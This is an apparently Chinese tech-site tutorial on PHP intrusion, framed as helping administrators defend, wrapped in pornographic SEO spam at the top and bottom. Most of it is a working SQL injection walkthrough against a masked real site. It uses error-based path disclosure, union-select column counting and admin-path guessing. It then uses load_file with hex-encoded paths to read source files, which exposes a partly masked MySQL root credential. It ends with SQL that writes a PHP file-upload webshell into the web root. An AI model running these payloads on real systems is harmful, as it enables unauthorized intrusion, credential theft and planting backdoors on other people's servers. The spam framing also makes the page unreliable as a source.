成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

實(shí)例講解PHP入侵

安全 黑客攻防
我們通過從尋找目標(biāo)到網(wǎng)站踩點(diǎn)來實(shí)現(xiàn)一次簡(jiǎn)單的PHP入侵全過程,其最終目的是讓企業(yè)安全管理人員能夠了解PHP入侵的全過程,以便著手防范。

PHP入侵是一種黑客比較常用的入侵方式,PHP入侵的操作簡(jiǎn)單和效果初中是其廣為流傳的原因。今天我們就通過一次簡(jiǎn)單的PHP入侵來看一下PHP入侵的全過程,其目的是為了企業(yè)安全管理員能夠洞悉PHP入侵技術(shù),提高安全防護(hù)水平。

測(cè)試站點(diǎn)如下

http://www.******.com

找個(gè)踩點(diǎn)

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830

提交一個(gè) '

返回結(jié)果

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 135

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 140

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in

/var/www/html/zhaobiao/zhaobiao_hy_show.php on line 154

路徑出來了,繼續(xù)安檢.

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830'and 1=1 #

返回錯(cuò)誤,不是字符型.

注明:%23是#

提交 and 1=1 返回正常

提交 and 1=2 返回不正常

接下來就是 union 語(yǔ)句

and 1=1 union select 1 返回不正常

and 1=1 union select 1,2 返回不正常

and 1=1 union select 1,2,3 返回不正常

and 1=1 union select 1,2,3,4 返回不正常

and 1=1 union select 1,2,3,4,5 返回不正常

and 1=1 union select 1,2,3,4,5,6 返回不正常

and 1=1 union select 1,2,3,4,5,6,7 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 返回不正常

and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 返回正常

猜到 14 就正常了 繼續(xù)PHP入侵的下一步.

一般這樣的站點(diǎn)基本上后臺(tái)是不可能那么容易讓我們找到的..

還是先看看有沒有再說吧..

猜猜常用的路徑.

login.php

admin.php

admin_login.php

admin_index.php

admin/login.php

admin/admin.php

admin/admin_login.php

admin/admin_index.php

manage/index.php

manage/login.php

manage/admin_login.php

manage/admin_index.php

等等.有耐心的可以慢慢去猜.就算猜到了也沒什么用.

我們還是用比較直接的方法吧.直接用 load_file 讀取文件內(nèi)容

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14
里面的 and 1=1 變成 and 1=2

返回結(jié)果如下:

2

就在2的位置暴了我們需要的文件內(nèi)容.

我們就從 /var/www/html/zhaobiao/zhaobiao_hy_show.php

直接用 load_fi

le('/var/www/html/zhaobiao/zhaobiao_hy_show.php')

前提是要把 /var/www/html/zhaobiao/zhaobiao_hy_show.php 轉(zhuǎn)換成 16 進(jìn)制

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file 

0x2F7661722F7777772F68746D6C2F7A68616F6269616F2F7A68616F6269616F5F68795F73

686F772E706870),3,4,5,6,7,8,9,10,11,12,13,14  

返回結(jié)果

 

  1. 0 or $regdate>mysql_result($query,0,'yxdate')){?>   
  2.  
  3.   ",mysql_result($query,0,'sm'));?>   

不要管這些,直接查看源文件找到了一個(gè) inc.php 的文件 然后配合前面的路徑

/var/www/html/inc.php

http://www.******.com/zhaobiao/zhaobiao_hy_show.php?id=149830 and 1=2 union select 1,load_file

(0x2F7661722F7777772F68746D6C2F696E632E706870),3,4,5,6,7,8,9,10,11,12,13,14

暴一下 返回看不到內(nèi)容 直接查看源文件

  1. <? 
  2. $myconn=mysql_connect('localhost','root','www.******.comy0p5h1i0');  
  3. mysql_select_db('mlk');  
  4. ?> 

Mysql 直接暴出來了..

下一步就是登陸 Mysql 然后插入自己準(zhǔn)備好的小馬..

  1. use mlk;  
  2. create table mmxy (cmd TEXT);  
  3. insert into mmxy values('<?php');  
  4. insert into mmxy values('$msg = copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]) ? "Successful" : "failure";');  
  5. insert into mmxy values('echo $msg;');  
  6. insert into mmxy values('?>');  
  7. insert into mmxy values('<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">');  
  8. insert into mmxy values('<input NAME="MyFile" TYPE="file">');  
  9. insert into mmxy values('<input VALUE="Up" TYPE="submit"></form>');  
  10. select * from mmxy into outfile '/var/www/html/zhaobiao/mmxy.php';  

 

【編輯推薦】

  1. 防止SQL注入攻擊:網(wǎng)絡(luò)管理員的前景展望
  2. ScanSafe:近期3波SQL注入攻擊100萬(wàn)中國(guó)網(wǎng)站
  3. 圖文詳解網(wǎng)站SQL注入攻擊解決全過程
  4. 有效預(yù)防SQL注入攻擊的六脈神劍
  5. 防止SQL注入攻擊:網(wǎng)絡(luò)管理員的前景展望

     

     
責(zé)任編輯:張啟峰 來源: 安全在線
相關(guān)推薦

2009-11-23 20:16:17

PHP接口特性

2009-11-23 17:31:49

PHP時(shí)間戳

2009-11-23 14:44:22

PHP 5.0構(gòu)造函數(shù)

2009-11-23 15:32:13

PHP獲取遠(yuǎn)程URL

2010-09-09 10:25:42

2009-12-10 15:09:46

PHP搜索引擎類

2009-11-25 15:07:39

PHP添加計(jì)數(shù)器

2010-09-13 12:41:23

2010-05-11 18:03:28

2010-09-08 14:23:14

測(cè)試Snort

2010-06-03 18:22:38

Hadoop

2011-04-02 16:37:26

PAT

2009-12-28 17:01:31

2012-11-28 17:51:50

2019-04-04 11:55:59

2009-11-17 15:07:16

PHP數(shù)組遍歷

2009-12-11 17:57:13

PHP應(yīng)用JSON

2011-07-05 17:52:41

PHP

2010-11-22 16:22:39

MySQL連接查詢

2010-03-03 14:05:36

Python實(shí)例應(yīng)用
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

主站蜘蛛池模板: www.788.com色淫免费| 国产美女精品 | 欧美一区二区三区四区五区无卡码 | 中文字幕高清视频 | 国产欧美精品一区二区三区 | 国产精品伦一区二区三级视频 | 国产精品福利在线 | 色综合网站 | 99亚洲精品 | 日韩一区二区av | 亚洲精品一 | 亚洲激情一级片 | 国产精品一卡二卡三卡 | 一级在线观看 | 亚洲第一福利网 | 精品一区二区在线观看 | av在线三级| 国产人成精品一区二区三 | 国产成人精品a视频一区www | 国产一区二区视频免费在线观看 | 欧美成人精品一区二区男人看 | 一区二区伦理电影 | 乳色吐息在线观看 | 国产视频第一页 | 91麻豆精品国产91久久久久久 | 国产一区亚洲二区三区 | 91免费观看在线 | 国产精品视频一二三区 | 免费看的黄网站 | 九九热re | 国产欧美精品区一区二区三区 | 久久国产成人午夜av影院武则天 | 日韩欧美二区 | 亚洲一区二区三区视频在线 | 欧美日韩成人在线 | 国产综合视频 | 成人精品免费视频 | 国产一区在线免费观看 | 亚洲精品久久久久久久久久久 | 欧美a视频| 黑人一级片视频 |